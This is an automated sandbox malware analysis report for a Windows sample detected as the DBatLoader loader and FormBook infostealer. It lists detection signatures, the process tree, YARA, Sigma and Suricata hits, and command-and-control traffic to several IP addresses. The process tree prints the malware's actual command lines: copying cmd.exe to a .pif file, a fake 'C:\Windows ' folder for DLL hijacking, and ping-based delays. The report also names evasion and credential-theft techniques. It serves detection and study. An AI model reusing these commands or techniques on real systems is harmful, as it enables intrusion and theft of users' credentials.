Edit tour

Windows Analysis Report
E8q16bf9QD.exe

Overview

General Information

Sample name:	E8q16bf9QD.exe renamed because original name is a hash value
Original sample name:	848ebacd95ead54cdcfe5d916093d2c8.exe
Analysis ID:	1665206
MD5:	848ebacd95ead54cdcfe5d916093d2c8
SHA1:	e41476e30342dfc3df606589f1eb91bf084c3a38
SHA256:	cfecc683911218dde9c607fc0365c31c3fa5e4f7561cb7a68bc99c96c68bf0a4
Tags:	exeuser-abuse_ch
Infos:

Detection

DBatLoader, FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected FormBook

Allocates many large memory junks

Allocates memory in foreign processes

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Found direct / indirect Syscall (likely to bypass EDR)

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes to foreign memory regions

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

E8q16bf9QD.exe (PID: 6888 cmdline: "C:\Users\user\Desktop\E8q16bf9QD.exe" MD5: 848EBACD95EAD54CDCFE5D916093D2C8)

cmd.exe (PID: 7148 cmdline: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7520.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

esentutl.exe (PID: 756 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

alpha.pif (PID: 1960 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

alpha.pif (PID: 5832 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7160 cmdline: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\843.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 6360 cmdline: ping 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)

iaoqralA.pif (PID: 6376 cmdline: C:\\Users\\user\\Links\iaoqralA.pif MD5: C116D3604CEAFE7057D77FF27552C215)

oSAWneqzPiahr.exe (PID: 3808 cmdline: "C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\azmUiMsus.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

systeminfo.exe (PID: 7252 cmdline: "C:\Windows\SysWOW64\systeminfo.exe" MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)

oSAWneqzPiahr.exe (PID: 892 cmdline: "C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\W7MhGnvMLjn.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 7388 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

Sgrmuserer.exe (PID: 7148 cmdline: C:\Windows\system32\Sgrmuserer.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1109334808.00000000022F6000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000006.00000002.1366673242.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000013.00000002.3576641121.0000000003A60000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1381979341.000000001BD90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000015.00000002.3578481874.00000000055A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000014.00000002.3576518310.00000000042F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000014.00000002.3574489923.0000000000650000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1382817620.000000001D6D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000014.00000002.3576588252.0000000004340000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.iaoqralA.pif.400000.1.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.E8q16bf9QD.exe.22f6178.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0.2.E8q16bf9QD.exe.2cf0000.1.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
6.2.iaoqralA.pif.400000.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.E8q16bf9QD.exe.22f6178.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\E8q16bf9QD.exe, ProcessId: 6888, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7520.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7148, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 1960, ProcessName: alpha.pif

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\user\\Links\iaoqralA.pif, CommandLine: C:\\Users\\user\\Links\iaoqralA.pif, CommandLine|base64offset|contains: , Image: C:\Users\user\Links\iaoqralA.pif, NewProcessName: C:\Users\user\Links\iaoqralA.pif, OriginalFileName: C:\Users\user\Links\iaoqralA.pif, ParentCommandLine: "C:\Users\user\Desktop\E8q16bf9QD.exe", ParentImage: C:\Users\user\Desktop\E8q16bf9QD.exe, ParentProcessId: 6888, ParentProcessName: E8q16bf9QD.exe, ProcessCommandLine: C:\\Users\\user\\Links\iaoqralA.pif, ProcessId: 6376, ProcessName: iaoqralA.pif

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-15T12:04:14.411591+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49693	192.197.113.156	80	TCP
2025-04-15T12:04:48.433307+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49698	13.248.169.48	80	TCP
2025-04-15T12:05:02.267639+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49702	209.74.80.150	80	TCP
2025-04-15T12:05:17.451620+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49706	38.181.35.142	80	TCP
2025-04-15T12:05:39.424066+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49710	104.21.85.156	80	TCP
2025-04-15T12:05:55.920111+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49714	13.248.169.48	80	TCP
2025-04-15T12:06:09.431502+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49718	13.248.169.48	80	TCP
2025-04-15T12:06:23.747195+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49722	104.21.41.226	80	TCP
2025-04-15T12:06:37.191338+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49726	3.33.130.190	80	TCP
2025-04-15T12:06:51.034117+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49730	172.67.190.25	80	TCP
2025-04-15T12:07:04.524544+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49734	13.248.169.48	80	TCP
2025-04-15T12:07:26.899894+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49738	144.76.229.203	80	TCP
2025-04-15T12:07:43.861294+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49742	13.248.169.48	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-15T12:04:14.411591+0200	2855465	1	A Network Trojan was detected	192.168.2.10	49693	192.197.113.156	80	TCP
2025-04-15T12:04:48.433307+0200	2855465	1	A Network Trojan was detected	192.168.2.10	49698	13.248.169.48	80	TCP
2025-04-15T12:05:02.267639+0200	2855465	1	A Network Trojan was detected	192.168.2.10	49702	209.74.80.150	80	TCP
2025-04-15T12:05:17.451620+0200	2855465	1	A Network Trojan was detected	192.168.2.10	49706	38.181.35.142	80	TCP
2025-04-15T12:05:39.424066+0200	2855465	1	A Network Trojan was detected	192.168.2.10	49710	104.21.85.156	80	TCP
2025-04-15T12:05:55.920111+0200	2855465	1	A Network Trojan was detected	192.168.2.10	49714	13.248.169.48	80	TCP
2025-04-15T12:06:09.431502+0200	2855465	1	A Network Trojan was detected	192.168.2.10	49718	13.248.169.48	80	TCP
2025-04-15T12:06:23.747195+0200	2855465	1	A Network Trojan was detected	192.168.2.10	49722	104.21.41.226	80	TCP
2025-04-15T12:06:37.191338+0200	2855465	1	A Network Trojan was detected	192.168.2.10	49726	3.33.130.190	80	TCP
2025-04-15T12:06:51.034117+0200	2855465	1	A Network Trojan was detected	192.168.2.10	49730	172.67.190.25	80	TCP
2025-04-15T12:07:04.524544+0200	2855465	1	A Network Trojan was detected	192.168.2.10	49734	13.248.169.48	80	TCP
2025-04-15T12:07:26.899894+0200	2855465	1	A Network Trojan was detected	192.168.2.10	49738	144.76.229.203	80	TCP
2025-04-15T12:07:43.861294+0200	2855465	1	A Network Trojan was detected	192.168.2.10	49742	13.248.169.48	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-15T12:04:38.229653+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49695	13.248.169.48	80	TCP
2025-04-15T12:04:41.989981+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49696	13.248.169.48	80	TCP
2025-04-15T12:04:44.769019+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49697	13.248.169.48	80	TCP
2025-04-15T12:04:54.086977+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49699	209.74.80.150	80	TCP
2025-04-15T12:04:56.788378+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49700	209.74.80.150	80	TCP
2025-04-15T12:04:59.518661+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49701	209.74.80.150	80	TCP
2025-04-15T12:05:08.764886+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49703	38.181.35.142	80	TCP
2025-04-15T12:05:11.646758+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49704	38.181.35.142	80	TCP
2025-04-15T12:05:14.603174+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49705	38.181.35.142	80	TCP
2025-04-15T12:05:31.467246+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49707	104.21.85.156	80	TCP
2025-04-15T12:05:34.118721+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49708	104.21.85.156	80	TCP
2025-04-15T12:05:36.768279+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49709	104.21.85.156	80	TCP
2025-04-15T12:05:44.890738+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49711	13.248.169.48	80	TCP
2025-04-15T12:05:50.568617+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49712	13.248.169.48	80	TCP
2025-04-15T12:05:53.229975+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49713	13.248.169.48	80	TCP
2025-04-15T12:06:01.407100+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49715	13.248.169.48	80	TCP
2025-04-15T12:06:04.069556+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49716	13.248.169.48	80	TCP
2025-04-15T12:06:06.731087+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49717	13.248.169.48	80	TCP
2025-04-15T12:06:15.622938+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49719	104.21.41.226	80	TCP
2025-04-15T12:06:18.255345+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49720	104.21.41.226	80	TCP
2025-04-15T12:06:20.997322+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49721	104.21.41.226	80	TCP
2025-04-15T12:06:29.195692+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49723	3.33.130.190	80	TCP
2025-04-15T12:06:31.857465+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49724	3.33.130.190	80	TCP
2025-04-15T12:06:34.526367+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49725	3.33.130.190	80	TCP
2025-04-15T12:06:43.109182+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49727	172.67.190.25	80	TCP
2025-04-15T12:06:45.722136+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49728	172.67.190.25	80	TCP
2025-04-15T12:06:48.387724+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49729	172.67.190.25	80	TCP
2025-04-15T12:06:56.494174+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49731	13.248.169.48	80	TCP
2025-04-15T12:06:59.169866+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49732	13.248.169.48	80	TCP
2025-04-15T12:07:01.864474+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49733	13.248.169.48	80	TCP
2025-04-15T12:07:18.652858+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49735	144.76.229.203	80	TCP
2025-04-15T12:07:21.408231+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49736	144.76.229.203	80	TCP
2025-04-15T12:07:24.165639+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49737	144.76.229.203	80	TCP
2025-04-15T12:07:32.336997+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49739	13.248.169.48	80	TCP
2025-04-15T12:07:35.002971+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49740	13.248.169.48	80	TCP
2025-04-15T12:07:37.670756+0200	2855464	1	A Network Trojan was detected	192.168.2.10	49741	13.248.169.48	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-15T12:06:04.069556+0200	2856318	1	A Network Trojan was detected	192.168.2.10	49716	13.248.169.48	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: E8q16bf9QD.exe	Virustotal: Detection: 71%			Perma Link
Source: E8q16bf9QD.exe	ReversingLabs: Detection: 77%

Yara detected FormBook

Source: Yara match	File source: 6.2.iaoqralA.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.iaoqralA.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1366673242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3576641121.0000000003A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1381979341.000000001BD90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3578481874.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3576518310.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3574489923.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1382817620.000000001D6D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3576588252.0000000004340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 90.4%

Source: E8q16bf9QD.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source:	Binary string: sysinfo.pdb source: iaoqralA.pif, 00000006.00000003.1366410561.000000001B8DD000.00000004.00000020.00020000.00000000.sdmp, oSAWneqzPiahr.exe, 00000013.00000003.1307066482.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, oSAWneqzPiahr.exe, 00000013.00000002.3575628985.0000000000A97000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sysinfo.pdbGCTL source: iaoqralA.pif, 00000006.00000003.1366410561.000000001B8DD000.00000004.00000020.00020000.00000000.sdmp, oSAWneqzPiahr.exe, 00000013.00000003.1307066482.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, oSAWneqzPiahr.exe, 00000013.00000002.3575628985.0000000000A97000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: E8q16bf9QD.exe, 00000000.00000002.1160502889.0000000020A63000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1160502889.0000000020A10000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1163403517.000000007EFE0000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1102777550.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000002.1366673242.0000000000890000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: iaoqralA.pif, 00000006.00000002.1382063833.000000001BE20000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000003.1265788222.000000001BACD000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000003.1268898161.000000001BC77000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000002.1382063833.000000001BFBE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000003.1366284416.00000000041FF000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000003.1369833932.00000000043A3000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000002.3576822678.0000000004550000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000002.3576822678.00000000046EE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1137755418.0000000005890000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000009.00000002.1168643613.0000000000251000.00000020.00000001.01000000.00000008.sdmp, alpha.pif, 0000000A.00000002.1172361748.0000000000251000.00000020.00000001.01000000.00000008.sdmp, alpha.pif.8.dr
Source:	Binary string: wntdll.pdb source: iaoqralA.pif, iaoqralA.pif, 00000006.00000002.1382063833.000000001BE20000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000003.1265788222.000000001BACD000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000003.1268898161.000000001BC77000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000002.1382063833.000000001BFBE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000014.00000003.1366284416.00000000041FF000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000003.1369833932.00000000043A3000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000002.3576822678.0000000004550000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000002.3576822678.00000000046EE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: E8q16bf9QD.exe, 00000000.00000002.1160502889.0000000020A63000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103403137.0000000000820000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1160502889.0000000020A10000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1163403517.000000007EFE0000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103403137.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1102777550.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000002.1366673242.0000000000890000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1137755418.0000000005890000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, alpha.pif, 00000009.00000002.1168643613.0000000000251000.00000020.00000001.01000000.00000008.sdmp, alpha.pif, 0000000A.00000002.1172361748.0000000000251000.00000020.00000001.01000000.00000008.sdmp, alpha.pif.8.dr
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oSAWneqzPiahr.exe, 00000013.00000000.1286142881.000000000079F000.00000002.00000001.01000000.0000000A.sdmp, oSAWneqzPiahr.exe, 00000015.00000000.1437227707.000000000079F000.00000002.00000001.01000000.0000000A.sdmp

Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CF54D0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_02CF54D0
Source: C:\Users\Public\alpha.pif	Code function: 9_2_00260207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	9_2_00260207
Source: C:\Users\Public\alpha.pif	Code function: 9_2_0026589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	9_2_0026589A
Source: C:\Users\Public\alpha.pif	Code function: 9_2_00273E66 FindFirstFileW,FindNextFileW,FindClose,	9_2_00273E66
Source: C:\Users\Public\alpha.pif	Code function: 9_2_00264EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	9_2_00264EC1
Source: C:\Users\Public\alpha.pif	Code function: 9_2_0025532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	9_2_0025532E
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_0066C530 FindFirstFileW,FindNextFileW,FindClose,	20_2_0066C530

Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 4x nop then xor eax, eax		20_2_00659EC0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 4x nop then mov ebx, 00000004h		20_2_044404E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49693 -> 192.197.113.156:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49693 -> 192.197.113.156:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49716 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49696 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.10:49716 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49706 -> 38.181.35.142:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49708 -> 104.21.85.156:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49713 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49724 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49705 -> 38.181.35.142:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49703 -> 38.181.35.142:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49711 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49706 -> 38.181.35.142:80
